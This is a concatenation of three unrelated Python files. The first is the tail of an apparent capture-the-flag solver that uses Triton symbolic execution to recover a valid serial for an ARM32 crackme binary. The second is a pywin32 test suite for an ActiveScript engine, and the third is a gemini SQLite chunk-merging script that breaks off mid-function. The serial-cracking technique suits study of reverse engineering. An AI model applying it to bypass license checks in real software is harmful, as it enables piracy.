# .text:00010514 BNE loc_10524
if pc == 0x10510 and SERIAL is None:
print('[+] Please wait, calculating hash collisions...')
r3 = ctx.getSymbolicRegister(ctx.registers.r3)
SymVar_0 = ctx.getSymbolicVariable('SymVar_0')
SymVar_1 = ctx.getSymbolicVariable('SymVar_1')
SymVar_2 = ctx.getSymbolicVariable('SymVar_2')
SymVar_3 = ctx.getSymbolicVariable('SymVar_3')
SymVar_4 = ctx.getSymbolicVariable('SymVar_4')
astCtxt = ctx.getAstContext()
# We want printable characters
expr = astCtxt.land([
astCtxt.bvugt(astCtxt.variable(SymVar_0), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_0), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_1), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_1), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_2), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_2), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_3), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_3), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.bvugt(astCtxt.variable(SymVar_4), astCtxt.bv(96, CPUSIZE.BYTE_BIT)),
astCtxt.bvult(astCtxt.variable(SymVar_4), astCtxt.bv(123, CPUSIZE.BYTE_BIT)),
astCtxt.equal(r3.getAst(), astCtxt.bv(0xad6d, CPUSIZE.DWORD_BIT)) # collision: (assert (= r3 0xad6d)
])
# Get max 20 different models
models = ctx.getModels(expr, 20)
print('[+] Found several hash collisions:')
for model in models:
print({k: "0x%x, '%c'" % (v.getValue(), v.getValue()) for k, v in list(model.items())})
SERIAL = str()
for _, v in list(sorted(models[0].items())):
SERIAL += "%c" % (v.getValue())
print('[+] Pick up the first serial: %s' %(SERIAL))
# Inc the number of instructions executed
count += 1
# Simulate routines
hookingHandler(ctx)
# Next
pc = ctx.getConcreteRegisterValue(ctx.registers.pc)
debug('[+] Instruction executed: %d' %(count))
return
def loadBinary(ctx, binary):
# Map the binary into the memory
phdrs = binary.segments
for phdr in phdrs:
size = phdr.physical_size
vaddr = phdr.virtual_address
debug('[+] Loading 0x%06x - 0x%06x' %(vaddr, vaddr+size))
ctx.setConcreteMemoryAreaValue(vaddr, phdr.content)
return
def makeRelocation(ctx, binary):
# Perform our own relocations
try:
for rel in binary.pltgot_relocations:
symbolName = rel.symbol.name
symbolRelo = rel.address
for crel in customRelocation:
if symbolName == crel[0]:
debug('[+] Hooking %s' %(symbolName))
debug(' {:x} : {:x}'.format(symbolRelo, crel[2]))
ctx.setConcreteMemoryValue(MemoryAccess(symbolRelo, CPUSIZE.DWORD), crel[2])
except:
pass
# Perform our own relocations
try:
for rel in binary.dynamic_relocations:
symbolName = rel.symbol.name
symbolRelo = rel.address
for crel in customRelocation:
if symbolName == crel[0]:
debug('[+] Hooking %s' %(symbolName))
debug(' {:x} : {:x}'.format(symbolRelo, crel[2]))
ctx.setConcreteMemoryValue(MemoryAccess(symbolRelo, CPUSIZE.DWORD), crel[2])
except:
pass
return
def run(ctx, binary):
# Concretize previous context
ctx.concretizeAllMemory()
ctx.concretizeAllRegister()
# Define a fake stack
ctx.setConcreteRegisterValue(ctx.registers.sp, BASE_STACK)
# Let's emulate the binary from the entry point
debug('[+] Starting emulation.')
emulate(ctx, binary.entrypoint)
debug('[+] Emulation done.')
return
def main():
global INPUT
global SERIAL
global FINISH
# Get a Triton context
ctx = TritonContext()
# Set the architecture
ctx.setArchitecture(ARCH.ARM32)
# Set optimization
ctx.setMode(MODE.ALIGNED_MEMORY, True)
ctx.setMode(MODE.ONLY_ON_SYMBOLIZED, True)
# Parse the binary
binary = lief.parse(TARGET)
# Load the binary
loadBinary(ctx, binary)
# Perform our own relocations
makeRelocation(ctx, binary)
# First emulation
run(ctx, binary)
FINISH = False
# Replace the input with the good serial to validate the chall
INPUT = SERIAL
# Second emulation
print('[+] Start a second emualtion with the good serial to validate the chall')
run(ctx, binary)
return not VALID == True
if __name__ == '__main__':
retValue = main()
sys.exit(retValue)
|
|
# These are tests for the IActiveScript related interfaces. They are
# written in Python as the pywin32 package provides support for the vtable
# based interfaces used - meaning the other (reasonable) alternative
# would be C++.
# The intention is that whereever possible, we use the Windows Scripting
# Host to test as much as possible - but anything that can't be done that
# way, such as basic checks of the engine itself, are done here.
# taken from pywin32's win32comext/axscript/test/testHost.py
import sys
import unittest
# These modules come from the pywin32 package (sf.net/projects/pywin32)
try:
import pythoncom
except ImportError:
print >> sys.stderr, "This package requires the pywin32 extensions - http://sf.net/projects/pywin32"
sys.exit(1)
from win32com.axscript import axscript
from win32com.server.util import wrap, Collection
from win32com.server.exception import COMException
import winerror
# Other misc stuff.
AXTAM_CLSID = "application/ecmascript;version=4"
# Known failures are a good indication of things todo :)
skip_known_failures = True #False
IActiveScriptSite_methods = """
GetLCID GetItemInfo GetDocVersionString OnScriptTerminate OnStateChange
OnScriptError OnEnterScript OnLeaveScript""".split()
class TestScriptCollection(Collection):
"""A 'collection', used to test enum semantics"""
def _NewEnum(self):
return Collection._NewEnum(self)
class TestScriptObject:
"""This object is added to the ScriptEngine with the name 'test'. Script
code can call reference the 'public' properties of this object.
"""
_public_methods_ = [ 'call', 'fail' ]
_public_attrs_ = ['value', 'collection', 'list']
def __init__(self):
self.collection = wrap( TestScriptCollection( [1,'Two',3] ))
self.list = ["One", 2, "Three"]
self.last_call_args = None
self.fail_called = 0
self.value = None
def call(self, *args):
self.last_call_args = args
def fail(self, hresult=winerror.E_FAIL):
raise COMException(hresult=hresult)
class AXTestSite:
"""An IActiveScriptSite implementation used for testing our engine."""
_public_methods_ = IActiveScriptSite_methods
_com_interfaces_ = [ axscript.IID_IActiveScriptSite ]
def __init__(self, testcase):
self.testcase = testcase
self.terminate_result = None
self.terminate_excepInfo = None
self.last_error = None
self.last_state = None
self.num_enter_script = 0
self.num_leave_script = 0
engine = pythoncom.CoCreateInstance(AXTAM_CLSID, None,
pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
# We use 2 interfaces from the object - get them now.
self.engine_script = engine.QueryInterface(axscript.IID_IActiveScript)
self.engine_parse = engine.QueryInterface(axscript.IID_IActiveScriptParse)
def init_engine(self):
self.engine_script.SetScriptSite(wrap(self))
self.engine_parse.InitNew()
def close(self):
# Should probably transition engine to the closed state too...
if self.engine_script:
self.engine_script.Close()
self.engine_script = None
self.engine_parse = None
def _SetNamedItems(self, items):
self.named_items = items
for name, (dispatch, typeinfo, flags) in self.named_items.iteritems():
self.engine_script.AddNamedItem(name, flags)
# IActiveScriptSite methods
def GetLCID(self):
return 0
def GetItemInfo(self, name, returnMask):
disp, ti, flags = self.named_items[name]
ret_disp = ret_ti = None
if returnMask & axscript.SCRIPTINFO_IUNKNOWN:
ret_disp = disp
if returnMask & axscript.SCRIPTINFO_ITYPEINFO:
ret_ti = ti
return ret_disp, ret_ti
def GetDocVersionString(self):
return 'axtam test script host 1.0'
def OnScriptTerminate(self, result, excepInfo):
self.terminate_result = result
self.terminate_excepInfo = excepInfo
def OnStateChange(self, state):
self.last_state = state
def OnScriptError(self, errorInterface):
self.last_error = errorInterface
def OnEnterScript(self):
self.num_enter_script += 1
def OnLeaveScript(self):
self.num_leave_script += 1
# The base classes for all our test cases. Note that tests should generally
# *not* be added to these base classes, else they will be run once for each
# class that derives from us.
# This is the most basic, and it doesn't fully iniitialize the engine.
# You may want to derive your test case from a sub-class rather than
# directly from this class.
class TestCase(unittest.TestCase):
expecting_errors = False
def setUp(self):
self.site = AXTestSite(self)
def tearDown(self):
if self.site:
try:
if not self.expecting_errors and self.site.last_error is not None:
excep_info = self.site.last_error.GetExceptionInfo()
self.fail("Script Error Detected: %s" % (excep_info,))
finally:
self.site.close()
def assertRaisesCOMError(self, func, *args, **kw):
expected_hresult = kw.get('hresult')
try:
func(*args)
raise AssertionError, "%s did not fail!" % (func,)
except pythoncom.com_error, exc:
if expected_hresult is None:
return
if exc[0] != expected_hresult:
self.fail("Expected %s to return %d - got %d instead" % (func, expected_hresult, exc[0]))
def _prepareNamedItems(self):
flags = axscript.SCRIPTITEM_ISVISIBLE | axscript.SCRIPTITEM_GLOBALMEMBERS
self.test_script_ob = TestScriptObject()
n = {'test': (wrap(self.test_script_ob), None, flags)}
self.site._SetNamedItems(n)
def parseScriptText(self, code,
sourceContextCookie=0,
startLineNumber=0,
flags=0,
start_engine=True, expect_exc=False):
try:
self.site.engine_parse.ParseScriptText(code, None, None, None,
sourceContextCookie,
startLineNumber, flags)
if start_engine:
self.startEngine()
self.failIf(expect_exc, "expected an exception - but things worked")
except pythoncom.com_error:
if not expect_exc:
raise
def startEngine(self):
self.site.engine_script.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
# Fully initialized the engine and adds a 'test' script object.
class TestCaseInitialized(TestCase):
def setUp(self):
TestCase.setUp(self)
self.site.init_engine()
self._prepareNamedItems()
# The "real" test cases - these have the tests...
class TestSimple(TestCaseInitialized):
def testSimple(self):
# do nothing at all - just make sure we can setup and tear down.
pass
class TestState(TestCase):
def _setCheckState(self, new_state):
self.site.engine_script.SetScriptState(new_state)
# check engine says its in the new state
self.failUnlessEqual(self.site.engine_script.GetScriptState(), new_state)
# check the engine called back with the new state correctly.
self.failUnlessEqual(self.site.engine_script.GetScriptState(), self.site.last_state)
def testStateInitialized(self):
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_UNINITIALIZED)
self.failUnlessEqual(self.site.last_state, None) # never been set yet.
# InitNew puts everything into the Initialized state.
self.site.init_engine()
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
# the engine should have notified of the new state.
self.failUnlessEqual(get_state(), self.site.last_state)
def testStateInitializedEarly(self):
# Check InitNew can be called before SetScriptSite, which is
# what IE does.
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_UNINITIALIZED)
self.site.engine_parse.InitNew()
# should now be initialized.
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
# set the site so we cleanup without dumping debug messages.
self.site.engine_script.SetScriptSite(wrap(self.site))
def testStateTransitions(self):
# InitNew puts everything into the Initialized state.
self.site.init_engine()
get_state = self.site.engine_script.GetScriptState
self.failUnlessEqual(get_state(), axscript.SCRIPTSTATE_INITIALIZED)
self.failUnlessEqual(get_state(), self.site.last_state)
# Move to started
self.site.engine_script.SetScriptState(axscript.SCRIPTSTATE_INITIALIZED)
# It should be impossible to transition back to UNINITIALIZED
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_UNINITIALIZED)
# But we should be able to move forward to STARTED then CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_STARTED)
# to CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_CONNECTED)
# It should be impossible to move back to STARTED
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED)
# but we *can* move back to initialized.
self._setCheckState(axscript.SCRIPTSTATE_INITIALIZED)
# Lets jump all the way to CONNECTED
self._setCheckState(axscript.SCRIPTSTATE_CONNECTED)
# Then DISCONNECTED
self._setCheckState(axscript.SCRIPTSTATE_DISCONNECTED)
# can't move back to started or connected
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED)
self.assertRaises(pythoncom.com_error, self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_CONNECTED)
# and again back to initialized.
self._setCheckState(axscript.SCRIPTSTATE_INITIALIZED)
# close the engine - all state transitions are invalid.
self._setCheckState(axscript.SCRIPTSTATE_CLOSED)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_INITIALIZED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_STARTED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_CONNECTED,
hresult = winerror.E_FAIL)
self.assertRaisesCOMError(self.site.engine_script.SetScriptState, axscript.SCRIPTSTATE_DISCONNECTED,
hresult = winerror.E_FAIL)
def testNothingExecutedUntilStarted(self):
code = "test.value = 2"
self.site.init_engine()
self._prepareNamedItems()
self.parseScriptText(code, start_engine=False)
# code should not have been executed - so .value should remain None
self.failUnlessEqual(self.test_script_ob.value, None)
# now move to started.
self.startEngine()
# code was executed, so .value should be 2
self.failUnlessEqual(self.test_script_ob.value, 2)
class TestNames(TestCaseInitialized):
def testExplicitKnownProperty(self):
code = "test.value = 2"
self.parseScriptText(code)
self.failUnlessEqual(self.test_script_ob.value, 2)
def testImplicitKnownProperty(self):
# Setting 'value' should set 'test.value', as the 'test' object was
# added with SCRIPTITEM_GLOBALMEMBERS
code = "value = 2"
self.parseScriptText(code)
if not skip_known_failures:
self.failUnlessEqual(self.test_script_ob.value, 2)
class TestExceptions(TestCaseInitialized):
expecting_errors = True # stop base class from complaining about exceptions
# The 'ulStartingLineNumber' param to the AXScript functions is ambiguous:
# MSDN says "Zero-based value that specifies which line the parsing will
# begin at", but it can be simply demonstrated JS uses a 1-based scheme
# (but I guess it depends how you define 0-based :) Sadly, the docs for
# GetSourcePosition, which is impacted by the ulStartingLineNumber, doesn't
# say anything about this.
# So: let's just prove we do the same as Microsoft's javascript.
def testJSLineOffset(self):
site = AXTestSite(self)
# javascript comes with Windows, so we can assume its installed.
engine = pythoncom.CoCreateInstance("javascript", None,
pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
try:
ias = engine.QueryInterface(axscript.IID_IActiveScript)
ias.SetScriptSite(wrap(site))
iasp = engine.QueryInterface(axscript.IID_IActiveScriptParse)
iasp.InitNew()
ias.SetScriptState(axscript.SCRIPTSTATE_CONNECTED)
# A SyntaxError on "line 2"
code = "// comment\nfoo]\n"
# pass a startLine of 0, JS says the error is on line 1.
sln = 0
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 1)
# pass a startLine of 1, JS says the error is on line 2.
sln = 1
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 2)
#
#
# Check a runtime error works the same way.
code = "// a comment line\nx = bad_name\n"
# pass a startLine of 0, JS says the error is on line 1.
sln = 0
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 1)
# pass a startLine of 1, JS says the error is on line 2.
sln = 1
try:
iasp.ParseScriptText(code, None, None, None, 0, sln, 0)
except pythoncom.com_error:
pass
ctx, line, col = site.last_error.GetSourcePosition()
self.failUnlessEqual(line, 2)
# See the later tests of our engine which test the same thing.
finally:
ias.Close()
iasp = None # incase a traceback holds on to it.
def testLineNumber(self):
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so its reported as 1 (see JS test above)
self.failUnlessEqual(line, 1)
# and so it again just to prove we aren't faking.
code = "// a comment line\n//\n//\n//\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so its reported as 4
self.failUnlessEqual(line, 4)
def testLineNumberAdjusted(self):
# Tell the script engine the source-code really started on line 10
# of a file, so numbers should be adjusted accordingly.
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, expect_exc=True, startLineNumber=1)
ctx, line, col = self.site.last_error.GetSourcePosition()
# zero-based line numbers, so its reported as 2 (see JS test above)
self.failUnlessEqual(line, 2)
def testContext(self):
code = "// a comment line\nx = bad_name\n"
self.parseScriptText(code, sourceContextCookie=123, expect_exc=True)
ctx, line, col = self.site.last_error.GetSourcePosition()
# The hope is that the existing IActiveScriptError impl can be
# replaced with a script version. The problem with that will be
# that the frame etc is not exposed to script, so its not clear
# how to do that.
if not skip_known_failures:
self.failUnlessEqual(ctx, 123)
def testCOMException(self):
code = "test.fail()"
self.parseScriptText(code, expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless(desc.startswith("COM Error"), desc)
def testSyntaxError(self, startLineNumber=0):
code = "\nfoo]\n"
self.parseScriptText(code, expect_exc=True, startLineNumber=startLineNumber)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless(desc.startswith("Syntax"), desc)
# we aren't expecting a traceback, as it would only be to the
# compiler itself - so no \n chars are expected.
self.failIf('\n' in desc, desc)
ctx, line, col = self.site.last_error.GetSourcePosition()
self.failUnlessEqual(line, startLineNumber+1) # zero based
# no column available :( ...
def testSyntaxErrorAdjusted(self):
self.testSyntaxError(startLineNumber=1)
def testFilename(self):
# Make sure the 'filename' of our script block is reported in both
# syntax and normal errors.
self.parseScriptText("foo=bar", expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless("<script 0>" in desc, desc)
# and do another one with a syntax error - and different name
self.parseScriptText("x]", sourceContextCookie=3, expect_exc=True)
scode, hlp, desc, blah, blah, hresult = self.site.last_error.GetExceptionInfo()
self.failUnless("<script 3>" in desc, desc)
class TestScriptDispatch(TestCaseInitialized):
# Test the IDispatch impls handed out by Tamarin.
# Note that in general, we avoid the pretty 'Dispatch' wrappers provided
# by the pywin32 package, to avoid obscuring tracebacks etc with the
# implementation details of those wrappers.
def testDispatchSimple(self):
code = "test.expando = 'hello'"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando', hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
# and there should not be a property named 'expando' on the raw
# IDispatch - Tamarin should have created it and been handing out
# the dispid for it.
self.failIf(hasattr(self.test_script_ob, 'expando'))
def testDispatchCall(self):
code = "function f(arg1, arg2, arg3) { return arg1 + arg2 + arg3}; test.expando_func = f;"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando',
hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando_func')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_METHOD,
True, # do we want a result?
'hello ', 'there ', 'Mark')
self.failUnlessEqual(ret, 'hello there Mark')
def testDispatchSub(self):
lcid = 0
code = "test.expando = {}\ntest.expando.sub = 'foo'"
disp_test = self.site.engine_script.GetScriptDispatch('test')
self.parseScriptText(code)
# getting the 'expando' object should give us a generic wrapper
# around a ScriptObject, which comes back as an IDispatch.
id_expando = disp_test.GetIDsOfNames(lcid, 'expando')
disp_expando = disp_test.Invoke(id_expando, lcid, pythoncom.DISPATCH_PROPERTYGET, True)
id_sub = disp_expando.GetIDsOfNames(0, 'sub')
val = disp_expando.Invoke(id_expando, lcid, pythoncom.DISPATCH_PROPERTYGET, True)
self.failUnlessEqual(val, 'foo')
def testDispatchLikeVBScript(self):
# vbscript calls all properties with DISPATCH_METHOD|DISPATCH_PROPERTYGET
# as it's syntax can't tell the difference. So test that.
lcid = 0
code = """
test.expando = 'hello'
function f(arg1, arg2, arg3) { return arg1 + arg2 + arg3}
test.expando_func = f
function f2() { return 'hello there'}
test.expando_func2 = f2
"""
self.parseScriptText(code)
disp = self.site.engine_script.GetScriptDispatch('test')
flags = pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD
# fetch the expando property
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, flags, True)
self.failUnlessEqual(ret, 'hello')
# call the expando function
dispid = disp.GetIDsOfNames(lcid, 'expando_func')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD,
True, # do we want a result?
'hello ', 'there ', 'Mark')
self.failUnlessEqual(ret, 'hello there Mark')
# and so a workaround in our code isn't forgotten...
# call the expando function that takes no params
if not skip_known_failures:
dispid = disp.GetIDsOfNames(lcid, 'expando_func2')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET | pythoncom.DISPATCH_METHOD,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello there')
def testDispatchRemembered(self):
# Check that a single ScriptObject is used for the same IDispatch
# pointer.
# This works "by accident" - the top-level names are cached by
# the impl. See the test below, which uses children of the
# top-level names, which tests our cache of all seen IDispatch obs.
code = "test.expando = 'hello'"
disp = self.site.engine_script.GetScriptDispatch('test')
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando', hresult=winerror.DISP_E_UNKNOWNNAME)
# Now execute the script code, which will define the name
self.parseScriptText(code)
lcid = 0
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
# and fetch it again - should still get 'hello'
disp = self.site.engine_script.GetScriptDispatch('test')
dispid = disp.GetIDsOfNames(lcid, 'expando')
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
def testDispatchRememberedSub(self):
# Check that a single ScriptObject is used for the same IDispatch
# pointer for an object other than a top-level "named item".
# set .value to an IDispatch object, and set an expando on that.
self.test_script_ob.value = wrap(TestScriptObject())
code = "test.value.expando = 'hello'"
# Now execute the script code, which will define the name
self.parseScriptText(code)
# damn - no expressions yet - so execute code that will fail if
# our condition is wrong.
self.parseScriptText("if (test.value.expando != 'hello') throw('wrong - got ' + test.value.expando);")
def testDispatchEquality(self):
self.test_script_ob.value = wrap(TestScriptObject())
code = "test.value.expando = 'hello'"
# Now execute the script code, which will define the name
self.parseScriptText(code)
# damn - no expressions yet - so execute code that will fail if
# our condition is wrong.
self.parseScriptText("if (test.value != test.value) throw('wrong - equality failed!');")
self.parseScriptText("if (!(test.value === test.value)) throw('wrong - identity failed!');")
def testDispatchList(self):
# No eval - so have script code throw exception on failure.
for code in ("if (test.list[0] != 'One') throw test.list[0]",
"if (test.list[1] != 2) throw test.list[1]",
"if (test.list[2] != 'Three') throw test.list[1]",
):
self.parseScriptText(code)
# tests specific to IDispachEx
class TestScriptDispatchEx(TestCaseInitialized):
def testCreateExpando(self):
# Create an expando via the IDispatchEx interface
disp = self.site.engine_script.GetScriptDispatch('test')
disp = disp.QueryInterface(pythoncom.IID_IDispatchEx)
# name should not exist.
self.assertRaisesCOMError(disp.GetIDsOfNames, 0, 'expando',
hresult=winerror.DISP_E_UNKNOWNNAME)
# Now define it
lcid = 0
dispid = disp.GetDispID('expando', pythoncom.fdexNameEnsure)
# should be undefined.
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, None)
# set it
disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYPUT,
False, # do we want a result?
'hello')
# get it
ret = disp.Invoke(dispid, lcid, pythoncom.DISPATCH_PROPERTYGET,
True) # do we want a result?
self.failUnlessEqual(ret, 'hello')
class TestDispatchConsumer(TestCaseInitialized):
def testExpando(self):
code = "test.expando = 'new value'"
self.parseScriptText(code)
# todo: check the new value - but how to do that (we don't have
# SCRIPTTEXT_ISEXPRESSION working yet)
def testCall(self):
self.parseScriptText("test.call()")
self.failUnlessEqual(self.test_script_ob.last_call_args, ())
self.parseScriptText("test.call('foo')")
self.failUnlessEqual(self.test_script_ob.last_call_args, ('foo',))
self.parseScriptText("test.call('foo', 'bar')")
self.failUnlessEqual(self.test_script_ob.last_call_args, ('foo', 'bar'))
def testDefaults(self):
# check a 'vanilla' DispatchConsumer can be converted to a string
self.parseScriptText("test.value='hello ' + test")
self.failUnless(self.test_script_ob.value.startswith('hello '))
if __name__=='__main__':
try:
pythoncom.CoCreateInstance(AXTAM_CLSID, None, pythoncom.CLSCTX_SERVER,
pythoncom.IID_IUnknown)
# cool - no problem - we can continue
except pythoncom.error, details:
print >> sys.stderr, "The axtam engine has not been registered - cannot execute tests"
sys.exit(1)
unittest.main()
|
|
#!/usr/bin/env python
import os
import shutil
import sqlite3
import sys
import uuid
import database as gemini_db
import gemini_load_chunk
def append_variant_info(main_curr, chunk_db):
"""
Append the variant and variant_info data from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
main_curr.execute("BEGIN TRANSACTION")
cmd = "INSERT INTO variants SELECT * FROM toMerge.variants"
main_curr.execute(cmd)
cmd = \
"INSERT INTO variant_impacts SELECT * FROM toMerge.variant_impacts"
main_curr.execute(cmd)
main_curr.execute("END TRANSACTION")
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_sample_genotype_counts(main_curr, chunk_db):
"""
Append the sample_genotype_counts from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO sample_genotype_counts \
SELECT * FROM toMerge.sample_genotype_counts"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_sample_info(main_curr, chunk_db):
"""
Append the sample info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "create table samples as select * from toMerge.samples where 1=0"
main_curr.execute(cmd)
cmd = "INSERT INTO samples SELECT * FROM toMerge.samples"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_resource_info(main_curr, chunk_db):
"""
Append the resource info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO resources SELECT * FROM toMerge.resources"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_version_info(main_curr, chunk_db):
"""
Append the version info from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO version SELECT * FROM toMerge.version"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_vcf_header(main_curr, chunk_db):
"""
Append the vcf_header from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO vcf_header SELECT * FROM toMerge.vcf_header"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_gene_summary(main_curr, chunk_db):
"""
Append the gene_summary from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO gene_summary SELECT * FROM toMerge.gene_summary"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def append_gene_detailed(main_curr, chunk_db):
"""
Append the gene_detailed from a chunk_db
to the main database.
"""
cmd = "attach ? as toMerge"
main_curr.execute(cmd, (chunk_db, ))
cmd = "INSERT INTO gene_detailed SELECT * FROM toMerge.gene_detailed"
main_curr.execute(cmd)
cmd = "detach toMerge"
main_curr.execute(cmd)
def update_sample_genotype_counts(main_curr, chunk_db):
"""
Update the main sample_genotype_counts table with the
counts observed in one of the chunked databases (chunk_db)
"""
curr_db_conn = sqlite3.connect(chunk_db)
curr_db_conn.isolation_level = None
curr_db_conn.row_factory = sqlite3.Row
curr_db_curr = curr_db_conn.cursor()
cmd = "SELECT sample_id, num_hom_ref, \
num_het, num_hom_alt, \
num_unknown FROM sample_genotype_counts"
curr_db_curr.execute(cmd)
for row in curr_db_curr:
main_curr.execute("""UPDATE sample_genotype_counts
SET num_hom_ref = num_hom_ref + ?,
num_het = num_het + ?,
num_hom_alt = num_hom_alt + ?,
num_unknown = num_unknown + ?
WHERE sample_id= ? """,
(row['num_hom_ref'],
row['num_het'],
row['num_hom_alt'],
row['num_unknown'],
row['sample_id']))
curr_db_curr.close()
def merge_db_chunks(args):
# open up a new database
if os.path.exists(args.db):
os.remove(args.db)
gemini_db.create_tables(args.db, gemini_load_chunk.get_extra_effects_fields(args) if args.vcf else [])
main_conn = sqlite3.connect(args.db)
main_conn.isolation_level = None
main_curr = main_conn.cursor()
main_curr.execute('PRAGMA synchronous = OFF')
main_curr.execute('PRAGMA journal_mode=MEMORY')
databases = []
for database in args.chunkdbs:
databases.append(database)
for idx, database in enumerate(databases):
db = database[0]
append_variant_info(main_curr, db)
# we only need to add these tables from one of the chunks.
if idx == 0:
append_sample_genotype_counts(main_curr, db)
append_sample_info(main_curr, db)
append_resource_info(main_curr, db)
append_version_info(main_curr, db)
append_vcf_header(main_curr, db)
append_gene_summary(main_curr, db)
append_gene_detailed(main_curr, db)
else:
update_sample_genotype_counts(main_curr, db)
if args.index:
gemini_db.create_indices(main_curr)
main_conn.commit()
main_curr.close()
def merge_chunks(parser, args):
